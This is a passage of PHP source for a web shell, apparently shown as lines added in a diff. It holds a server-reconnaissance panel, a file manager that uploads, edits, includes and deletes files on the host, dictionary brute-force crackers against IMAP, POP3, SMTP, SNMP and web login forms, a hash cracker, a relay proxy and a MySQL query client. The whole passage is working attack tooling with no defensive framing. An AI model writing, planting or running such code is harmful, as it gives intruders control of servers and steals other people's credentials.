href=\"?=".zend_logo_guid()."\" target=\"_blank\">".zend_version()."</a>";else echo "Not Found";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Include path:</td><td bgcolor=\"#808080\">".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td><tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td><td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Disabled functions:</td><td bgcolor=\"#808080\">";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$safemode</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Open base dir:</td><td bgcolor=\"#808080\">$basedir</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td><td bgcolor=\"#666666\">";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle</a> ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" bgcolor=\"#808080\">cURL support:</td><td bgcolor=\"#808080\">Enabled ";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "<tr><td>User information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">$uip</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Agent:</td><td bgcolor=\"#808080\">".getenv('HTTP_USER_AGENT')."</td></tr></table>"; +} +function checksuM($file){ +global $et; +echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td width=\"10%\" bgcolor=\"#666666\"><b>MD5:</b> <font color=#F0F0F0>".md5_file($file)."</font><br><b>SHA1:</b> <font color=#F0F0F0>".sha1_file($file)."</font>$et"; +} +function listdiR($cwd,$task){ +$c= getcwd(); +$dh = opendir($cwd); +while ($cont=readdir($dh)){ +if($cont=='.' || $cont=='..')continue; +$adr = $cwd.DIRECTORY_SEPARATOR.$cont; +switch ($task){ +case '0':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; +case '1':if(is_writeable($adr))if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; +case '2':if(is_file($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break; +case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; +case '4':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break; +case '5':if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; +case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break; +case '7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break; +} +if (is_dir($adr)) listdiR($adr,$_REQUEST['task']); +} +} +if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}} +if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}} +function filemanager(){ +global $windows,$msgbox,$errorbox,$t,$et,$hcwd; +$cwd= getcwd(); +$table = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\">"; +$td1n="<td width=\"22%\" bgcolor=\"#666666\">"; +$td2m="<td width=\"22%\" bgcolor=\"#808080\">"; +$td1i="<td width=\"5%\" bgcolor=\"#666666\">"; +$td2i="<td width=\"5%\" bgcolor=\"#808080\">"; +$tdnr="<td width=\"22%\" bgcolor=\"#800000\">"; +$tdw="<td width=\"22%\" bgcolor=\"#006E00\">"; +if (!empty($_REQUEST['task'])){ +if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7; +if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6; +echo "<font color=blue><pre>"; +listdiR($cwd,$_REQUEST['task']); +echo "</pre></font>"; +}else{ +if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){ +if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){ +$title="Destination"; +$ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV']; +$dis =(!empty($_REQUEST['cP']))?'Copy':'Move'; +}else{ +$ad = $_REQUEST['rN']; +$title ="New name"; +$dis = "Rename"; +} +if (!!empty($_REQUEST['deS'])){ +echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"100%\" bgcolor=\"#333333\">$title:</td></tr><tr>$td1n<form method=\"POST\"><input type=text value=\"";if(empty($_REQUEST['rN'])) echo $cwd; echo "\" size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value=\"".htmlspecialchars($ad)."\" name=cp><input class=buttons type=submit value=$dis></td></tr></form></table></center>"; +}else{ +if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']); +else{ +copy($ad,$_REQUEST['deS']); +if (!empty($_REQUEST['mV']))unlink($ad); +} +} +} +if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) { +$dh = opendir($_REQUEST['deL']); +$d=""; +while ($cont=readdir($dh)){$d++;} +if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty!<td><tr></table><br>";else rmdir($_REQUEST['del']);}} +if (!empty($_FILES['uploadfile'])){ +move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']); +echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>"; +} +$select = "<select onChange=\"window.location=this.options[this.selectedIndex].value;\"><option value=\"".hlinK("seC=fm&workingdiR=$cwd")."\">--------</option><option value=\""; +if (!empty($_REQUEST['newf'])){ +if (!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],"");} +if (!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);} +} +if ($windows){ +echo "$table<td><b>Drives:</b> "; +for ($i=66;$i<=90;$i++){$drive= chr($i).':'; +if (is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$vol\" href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";} +} +echo $et; +} +echo "$table<form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=135 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table>"; +$file=array();$dir=array();$link=array(); +if($dirhandle = opendir($cwd)){ +while ($cont=readdir($dirhandle)){ +if (is_dir($cwd.DIRECTORY_SEPARATOR.$cont)) $dir[]= $cont; +elseif (is_file($cwd.DIRECTORY_SEPARATOR.$cont)) $file[]=$cont; +else $link[]=$cont; +} +closedir($dirhandle); +sort($file);sort($dir);sort($link); +echo "<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td width=\"30%\" bgcolor=\"#333333\" align=\"center\">Name</td><td width=\"13%\" bgcolor=\"#333333\" align=\"center\">Owner</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Modification time</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Last change</td><td width=\"5%\" bgcolor=\"#333333\" align=\"center\">Info</td><td width=\"7%\" bgcolor=\"#333333\" align=\"center\">Size</td><td width=\"15%\" bgcolor=\"#333333\" align=\"center\">Actions</td></tr>"; +$i=0; +foreach($dir as $dn){ +echo "<tr>"; +$i++; +$own="Unknow"; +$owner=posix_getpwuid(fileowner($dn)); +$mdate=date("Y/m/d H:i:s",filemtime($dn)); +$adate=date("Y/m/d H:i:s",fileatime($dn)); +$diraction = $select.hlinK("seC=fm&workingdiR=".realpath($dn))."\">Open</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."\">Remove</option></select></td>"; +if ($owner) $own = "<a title=\" Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; +if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if (is_writeable($dn)) echo $tdw;elseif (!is_readable($dn)) echo $tdnr;else echo $cl2; +echo "<a href=\"".hlinK("seC=fm&workingdiR=".realpath($dn))."\">"; +if (strlen($dn)>45)echo substr($dn,0,42)."...";else echo $dn;echo "</a>"; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>${cl1}D";if (is_readable($dn)) echo "R";if (is_writeable($dn)) echo "W";echo "</td>"; +echo "$cl1------</td>"; +echo $cl2.$diraction; +echo "</tr>" ; +flusheR(); +} +foreach($file as $fn){ +echo "<tr>"; +$i++; +$own = "Unknow"; +$owner = posix_getpwuid(fileowner($fn)); +$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$fn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."\">Remove</option></select></td>"; +$mdate = date("Y/m/d H:i:s",filemtime($fn)); +$adate = date("Y/m/d H:i:s",fileatime($fn)); +if ($owner) $own = "<a title=\"Shell:".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; +$size = showsizE(filesize($fn)); +if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if (is_writeable($fn)) echo $tdw;elseif (!is_readable($fn)) echo $tdnr;else echo $cl2; +echo "<a href=\"".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">"; +if (strlen($fn)>45)echo substr($fn,0,42)."...";else echo $fn;echo "</a>"; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>$cl1";if (is_readable($fn)) echo "R";if (is_writeable($fn)) echo "W";if (is_executable($fn)) echo "X";if (is_uploaded_file($fn)) echo "U"; echo "</td>"; +echo "$cl1$size</td>"; +echo $td2m.$fileaction; +echo "</tr>" ; +flusheR(); +} +foreach($link as $ln){ +$own = "Unknow"; +$i++; +$owner = posix_getpwuid(fileowner($ln)); +$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."\">Remove</option></select></td>"; +$mdate = date("Y/m/d H:i:s",filemtime($ln)); +$adate = date("Y/m/d H:i:s",fileatime($ln)); +if ($owner) $own = "<a title=\"Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; +echo "<tr>"; +$size = showsizE(filesize($ln)); +if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if (is_writeable($ln)) echo $tdw;elseif (!is_readable($ln)) echo $tdnr;else echo $cl2; +echo "<a href=\"".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."\">"; +if (strlen($ln)>45)echo substr($ln,0,42)."...";else echo $ln;echo "</a>"; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>${cl1}L";if (is_readable($ln)) echo "R";if (is_writeable($ln)) echo "W";if (is_executable($ln)) echo "X"; echo "</td>"; +echo "$cl1$size</td>"; +echo $cl2.$linkaction; +echo "</tr>" ; +flusheR(); +} +} +$dc = count($dir)-2; +if($dc==-2)$dc=0; +$fc = count($file); +$lc = count($link); +$total = $dc + $fc + $lc; +echo "$table<tr><td><form method=POST>Find:<input type=text name=search><input type=checkbox name=re value=1 style=\"border-width:1px;background-color:#333333;\" checked>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value=\"fm\" name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width=\"100%\"><tr><td width=\"50%\"><br><table bgcolor=#333333 border=0 width=\"65%\"><td><b>Summery:</b> Total: $total Directories: $dc Files: $fc Links: $lc</td></table><table bgcolor=#333333 border=0 width=\"65%\"><td width=\"100%\" bgcolor=";if (is_writeable($cwd)) echo "#006E00";elseif (!is_readable($cwd)) echo "#800000";else "#333333"; echo ">Current directory status: "; if (is_readable($cwd)) echo "R";if (is_writeable($cwd)) echo "W" ;echo "</td></table><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"65%\"><tr><td width=\"100%\" bgcolor=\"#333333\">New:</td></tr><tr>$td1n<form method=\"POST\"><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value=\"File\"><input class=buttons type=submit name=newdir value=\"Folder\"></td></tr></form></table></td><td width=\"50%\"><br>${t}Upload:</td></tr><tr>$td1n<form method=\"POST\" enctype=\"multipart/form-data\"><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is ".ini_get('upload_max_filesize')."</td></tr></form></table>$et"; +} +} +function imaplogiN($host,$username,$password){ +$sock=fsockopen($host,143,$n,$s,5); +$b=namE(); +$l=strlen($b); +if(!$sock)return -1; +fread($sock,1024); +fputs($sock,"$b LOGIN $username $password\r\n"); +$res=fgets($sock,$l+4); +if ($res == "$b OK")return 1;else return 0; +fclose($sock); +} +function pop3logiN($server,$user,$pass){ +$sock=fsockopen($server,110,$en,$es,5); +if(!$sock)return -1; +fread($sock,1024); +fwrite($sock,"user $user\n"); +$r=fgets($sock); +if($r{0}=='-')return 0; +fwrite($sock,"pass $pass\n"); +$r=fgets($sock); +fclose($sock); +if($r{0}=='+')return 1; +return 0; +} +function imapcrackeR(){ +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$imap=imaplogiN($target,$user,$pass); +if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{ +if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}} +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else echo "<center>${t}IMAP cracker:$crack"; +} +function snmpcrackeR(){ +global $t,$et,$errorbox,$crack,$hcwd; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); +while(!feof($dictionary)){ +$com=trim(fgets($dictionary)," \n\r"); +$res=snmpchecK($target,$com,2); +if($res)echo "$com<br>"; +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else echo "<center>${t}SNMP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>"; +} +function pop3crackeR(){ +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$pop3=pop3logiN($target,$user,$pass); +if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{ +if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}} +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else echo "<center>${t}POP3 cracker:$crack"; +} +function smtpcrackeR(){ +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$smtp=smtplogiN($target,$user,$pass,5); +if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{ +if ($smtp){echo "U: $user P: $pass<br>";if(!$type)break;}} +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else echo "<center>${t}SMTP cracker:$crack"; +} +function formcrackeR(){ +global $errorbox,$footer,$et,$hcwd; +if(!empty($_REQUEST['start'])){ +$url=$_REQUEST['target']; +$uf=$_REQUEST['userf']; +$pf=$_REQUEST['passf']; +$sf=$_REQUEST['submitf']; +$sv=$_REQUEST['submitv']; +$method=$_REQUEST['method']; +$fail=$_REQUEST['fail']; +$dic=$_REQUEST['dictionary']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer"); +$dictionary=fopen($dic,'r'); +echo "<font color=blue>Cracking started...<br>"; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$url.="?$uf=$user&$pf=$pass&$sf=$sv"; +$res=check_urL($url,$method,$fail,12); +if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;} +flusheR(); +} +fclose($dictionary); +echo "Done!</font><br>"; +} +else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>"; +} +function hashcrackeR(){ +global $errorbox,$t,$et,$hcwd; +if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){ +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +$hash=strtoupper($_REQUEST['hash']); +echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR(); +$type=($_REQUEST['type']=='MD5')?'md5':'sha1'; +while(!feof($dictionary)){ +$word=trim(fgets($dictionary)," \n\r"); +if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;} +} +echo "Done!</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +echo "<center>${t}Hash cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; +} +function pr0xy(){ +global $errorbox,$et,$footer,$hcwd; +echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>"; +if (!empty($_REQUEST['urL'])){ +$dir=""; +$u=parse_url($_REQUEST['urL']); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/'))); +$url=@fsockopen($host, 80, $errno, $errstr, 12); +if(!$url)die("<br>$errorbox Can not connect to host!$et$footer"); +fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); +while(!feof($url)){ +$con = fgets($url); +$con = str_replace("href=mailto","HrEf=mailto",$con); +$con = str_replace("HREF=mailto","HrEf=mailto",$con); +$con = str_replace("href=\"mailto","HrEf=\"mailto",$con); +$con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con); +$con = str_replace("href=\'mailto","HrEf=\"mailto",$con); +$con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con); +$con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); +echo $con; +} +fclose($url); +} +} +function mysqlclienT(){ +global $t,$errorbox,$et,$hcwd; +if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && !empty($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ +$server=$_REQUEST['serveR'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; +if(!empty($_REQUEST['dB']))$db=$_REQUEST['dB']; +$link = @mysql_connect($server,$user,$pass); +if($link){ +if (!empty($db))mysql_select_db($db); +$result=mysql_query($query,$link); +echo "${t}Query result(s):$et"; +echo "<font color=blue><pre>"; +while($data=mysql_fetch_row($result)){ +foreach($data as $v) { +echo $v; +echo "\t"; +} +echo "\n"; +} +echo "</pre></font>"; +mysql_close($link); +} +else{ +echo "$errorbox Login failed!$et<br>"; +} +} +echo "<center>${t}MySQL 